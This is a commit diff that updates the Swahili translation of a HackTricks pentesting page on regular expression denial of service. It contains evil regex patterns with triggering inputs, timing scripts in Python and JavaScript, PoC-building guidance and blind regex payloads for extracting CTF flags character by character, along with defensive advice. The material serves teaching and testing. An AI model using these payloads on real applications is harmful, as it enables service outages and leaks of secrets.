mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['', 'src/pentesting-web/regular-expression-denial-of-service
This commit is contained in:
Translator
parent
113111e14a
commit
a322ea87ae
@ -4,38 +4,67 @@
|
|||||||
|
|
||||||
# Regular Expression Denial of Service (ReDoS)
|
# Regular Expression Denial of Service (ReDoS)
|
||||||
|
|
||||||
**Regular Expression Denial of Service (ReDoS)** hutokea wakati mtu anatumia udhaifu katika jinsi regular expressions (njia ya kutafuta na kulinganisha mifumo katika maandiko) inavyofanya kazi. Wakati mwingine, wakati regular expressions zinatumika, zinaweza kuwa polepole sana, hasa ikiwa kipande cha maandiko wanachofanya kazi nacho kinakuwa kikubwa. Polepole hii inaweza kuwa mbaya kiasi kwamba inakua haraka sana hata kwa ongezeko dogo la ukubwa wa maandiko. Washambuliaji wanaweza kutumia tatizo hili kufanya programu inayotumia regular expressions isifanye kazi vizuri kwa muda mrefu.
|
Hali ya **Regular Expression Denial of Service (ReDoS)** hutokea wakati mtu anachukua faida ya udhaifu katika jinsi regular expressions (njia ya kutafuta na kulinganisha mifumo ndani ya maandishi) zinavyofanya kazi. Wakati mwingine, wakati regular expressions zinapotumika, zinaweza kuwa polepole sana, hasa ikiwa kipande cha maandishi zinachofanyia kazi kinapokua. Upole huo unaweza kuwa mbaya kiasi kwamba unakua kwa haraka sana hata kwa ongezeko dogo la ukubwa wa maandishi. Wadukuzi wanaweza kutumia tatizo hili kufanya programu inayotumia regular expressions isifanye kazi vizuri kwa muda mrefu.
|
||||||
|
|
||||||
## The Problematic Regex Naïve Algorithm
|
## The Problematic Regex Naïve Algorithm
|
||||||
|
|
||||||
**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
|
**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
|
||||||
|
|
||||||
## Evil Regexes <a href="#evil-regexes" id="evil-regexes"></a>
|
### Tabia za engine na uwezekano wa kutumiwa kwa shambulio
|
||||||
|
|
||||||
Mifumo ya regular expression mbaya ni ile inayoweza **kushikilia kwenye ingizo lililotengenezwa na kusababisha DoS**. Mifumo ya regex mbaya kwa kawaida ina kundi lenye kurudiwa na kurudiwa au mbadala na kuingiliana ndani ya kundi lililorejelewa. Baadhi ya mifano ya mifumo mbaya ni:
|
- Most popular engines (PCRE, Java `java.util.regex`, Python `re`, JavaScript `RegExp`) zinatumia VM ya **backtracking**. Vingizo vilivyotengenezwa vinavyosababisha njia nyingi zinazofanana za kulinganisha subpattern vinalazimisha backtracking ya eksponentiali au ya polynomial ya daraja kubwa.
|
||||||
|
- Baadhi ya engines/libraries zimetengenezwa kuwa **ReDoS-resilient** kwa muundo (hakuna backtracking), mfano **RE2** na ports zinazotumia finite automata ambazo hutoa wakati wa mstari katika hali mbaya kabisa; kuzitumia kwa input zisizotegemewa huondoa primitive ya DoS ya backtracking. Angalia marejeo mwishoni kwa maelezo.
|
||||||
|
|
||||||
|
## Regex Hatari <a href="#evil-regexes" id="evil-regexes"></a>
|
||||||
|
|
||||||
|
Pattern ya regular expression hatari ni ile inayoweza **kushikwa na input iliyotengenezwa (crafted) ikisababisha DoS**. Patterns hatari za regex kwa kawaida zina grouping zenye repetition na kurudia au alternation zenye overlapping ndani ya kundi linalorudiwa. Baadhi ya mifano ya patterns hatari ni:
|
||||||
|
|
||||||
- (a+)+
|
- (a+)+
|
||||||
- ([a-zA-Z]+)\*
|
- ([a-zA-Z]+)\*
|
||||||
- (a|aa)+
|
- (a|aa)+
|
||||||
- (a|a?)+
|
- (a|a?)+
|
||||||
- (.\*a){x} kwa x > 10
|
- (.*a){x} for x > 10
|
||||||
|
|
||||||
Zote hizo ni dhaifu kwa ingizo `aaaaaaaaaaaaaaaaaaaaaaaa!`.
|
Yote hayo yana udhaifu kwa input `aaaaaaaaaaaaaaaaaaaaaaaa!`.
|
||||||
|
|
||||||
|
### Mwongozo wa vitendo wa kujenga PoCs
|
||||||
|
|
||||||
|
Mengi ya matukio mabaya huwa na muundo kama huu:
|
||||||
|
|
||||||
|
- Prefix inayokupeleka katika subpattern zilizo hatarini (hiari).
|
||||||
|
- Msururu mrefu wa karakteri unaosababisha matches za utata ndani ya quantifiers zilizofungwa/zinazoingiliana (mf., `a` nyingi, `_`, au nafasi).
|
||||||
|
- Karakteri ya mwisho inayofanya jumla kushindwa ili engine ilazimike kufanya backtrack kupitia uwezekano wote (mara nyingi karakteri ambayo haitafanana na tokeni ya mwisho, kama `!`).
|
||||||
|
|
||||||
|
Mifano ya msingi:
|
||||||
|
|
||||||
|
- `(a+)+$` vs input `"a"*N + "!"`
|
||||||
|
- `\w*_*\w*$` vs input `"v" + "_"*N + "!"`
|
||||||
|
|
||||||
|
Ongeza N na uchunguze ukuaji wa super‑linear.
|
||||||
|
|
||||||
|
#### Harakati ya upimaji wa muda (Python)
|
||||||
|
```python
|
||||||
|
import re, time
|
||||||
|
pat = re.compile(r'(\w*_)\w*$')
|
||||||
|
for n in [2**k for k in range(8, 15)]:
|
||||||
|
s = 'v' + '_'*n + '!'
|
||||||
|
t0=time.time(); pat.search(s); dt=time.time()-t0
|
||||||
|
print(n, f"{dt:.3f}s")
|
||||||
|
```
|
||||||
## ReDoS Payloads
|
## ReDoS Payloads
|
||||||
|
|
||||||
### String Exfiltration via ReDoS
|
### String Exfiltration via ReDoS
|
||||||
|
|
||||||
Katika CTF (au bug bounty) labda unafanya **udhibiti wa Regex ambayo taarifa nyeti (bendera) inalinganishwa nayo**. Kisha, inaweza kuwa na manufaa kufanya **ukurasa usimame (timeout au muda mrefu wa usindikaji)** ikiwa **Regex ililingana** na **sio ikiwa haikulingana**. Kwa njia hii utaweza **kuondoa** string **karakteri kwa karakteri**:
|
Katika CTF (au bug bounty) labda wewe **unadhibiti Regex ambayo taarifa nyeti (the flag) inalingana nayo**. Kisha, inaweza kuwa muhimu kusababisha **ukurasa uzime (timeout au muda mrefu zaidi wa usindikaji)** ikiwa **Regex matched** na **sio ikiwa haikutokea**. Kwa njia hii utaweza **exfiltrate** string hiyo **herufi kwa herufi**:
|
||||||
|
|
||||||
- Katika [**hiki posti**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) unaweza kupata sheria hii ya ReDoS: `^(?=<flag>)((.*)*)*salt$`
|
- Katika [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=<flag>)((.*)*)*salt$`
|
||||||
- Mfano: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
|
- Mfano: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
|
||||||
- Katika [**hiki andiko**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) unaweza kupata hii:`<flag>(((((((.*)*)*)*)*)*)*)!`
|
- Katika [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`<flag>(((((((.*)*)*)*)*)*)*)!`
|
||||||
- Katika [**hiki andiko**](https://ctftime.org/writeup/25869) alitumia: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
|
- Katika [**this writeup**](https://ctftime.org/writeup/25869) he used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
|
||||||
|
|
||||||
### ReDoS Controlling Input and Regex
|
### ReDoS Controlling Input and Regex
|
||||||
|
|
||||||
Ifuatayo ni mifano ya **ReDoS** ambapo unafanya **udhibiti** wa **ingizo** na **regex**:
|
Zifuatazo ni mifano ya **ReDoS** ambapo **unadhibiti** pande zote, yaani **input** na **regex**:
|
||||||
```javascript
|
```javascript
|
||||||
function check_time_regexp(regexp, text) {
|
function check_time_regexp(regexp, text) {
|
||||||
var t0 = new Date().getTime()
|
var t0 = new Date().getTime()
|
||||||
@ -65,16 +94,35 @@ Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
|
|||||||
Regexp (a+)*$ took 723 milliseconds.
|
Regexp (a+)*$ took 723 milliseconds.
|
||||||
*/
|
*/
|
||||||
```
|
```
|
||||||
|
### Maelezo ya lugha/muhimili kwa washambuliaji
|
||||||
|
|
||||||
|
- JavaScript (browser/Node): Built‑in `RegExp` ni backtracking engine na mara nyingi inaweza kutumika ikiwa regex+input vinaratibiwa na mshambuliaji.
|
||||||
|
- Python: `re` ni backtracking. Mfululizo mrefu wa utata pamoja na tail inayoshindwa mara nyingi husababisha catastrophic backtracking.
|
||||||
|
- Java: `java.util.regex` ni backtracking. Ikiwa unadhibiti tu input, angalia endpoints zinazotumia complex validators; ikiwa unadhibiti patterns (mfano, stored rules), ReDoS kawaida ni rahisi.
|
||||||
|
- Engines such as **RE2/RE2J/RE2JS** or the **Rust regex** crate zimeundwa kuepuka catastrophic backtracking. Ikiwa unakutana nazo, zingatia vizingiti vingine (mfano, enormous patterns) au tafuta components zinazotumia backtracking engines.
|
||||||
|
|
||||||
## Vifaa
|
## Vifaa
|
||||||
|
|
||||||
- [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
|
- [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
|
||||||
|
- Tafuta regexes zilizo hatarini na auto‑generate evil inputs. Mfano:
|
||||||
|
- `pip install regexploit`
|
||||||
|
- Chunguza pattern moja kwa mwingiliano: `regexploit`
|
||||||
|
- Scan Python/JS code kwa regexes: `regexploit-py path/` and `regexploit-js path/`
|
||||||
- [https://devina.io/redos-checker](https://devina.io/redos-checker)
|
- [https://devina.io/redos-checker](https://devina.io/redos-checker)
|
||||||
|
- [https://github.com/davisjam/vuln-regex-detector](https://github.com/davisjam/vuln-regex-detector)
|
||||||
|
- End‑to‑end pipeline ya kutoa regexes kutoka kwenye project, kugundua zile zilizo hatarini, na kuthibitisha PoCs katika lugha ya lengwa. Inafaa kwa kupeleleza codebases kubwa.
|
||||||
|
- [https://github.com/tjenkinson/redos-detector](https://github.com/tjenkinson/redos-detector)
|
||||||
|
- Simple CLI/JS library inayochambua backtracking kuripoti kama pattern ni salama.
|
||||||
|
|
||||||
|
> Tip: Ukiwa unadhibiti tu input, tengeneza strings zenye urefu unaozidisha mara mbili (mfano, 2^k characters) na fuatilia latency. Ukuaji wa exponential unaonyesha kwa nguvu hali inayoweza kuleta ReDoS.
|
||||||
|
|
||||||
## Marejeleo
|
## Marejeleo
|
||||||
|
|
||||||
- [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
|
- [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
|
||||||
- [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
|
- [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
|
||||||
- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
|
- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html)
|
||||||
- [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
|
- [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
|
||||||
|
- SoK (2024): Mapitio ya Fasihi na Uhandisi ya Regular Expression Denial of Service (ReDoS) — [https://arxiv.org/abs/2406.11618](https://arxiv.org/abs/2406.11618)
|
||||||
|
- Why RE2 (linear‑time regex engine) — [https://github.com/google/re2/wiki/WhyRE2](https://github.com/google/re2/wiki/WhyRE2)
|
||||||
|
|
||||||
{{#include ../banners/hacktricks-training.md}}
|
{{#include ../banners/hacktricks-training.md}}
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user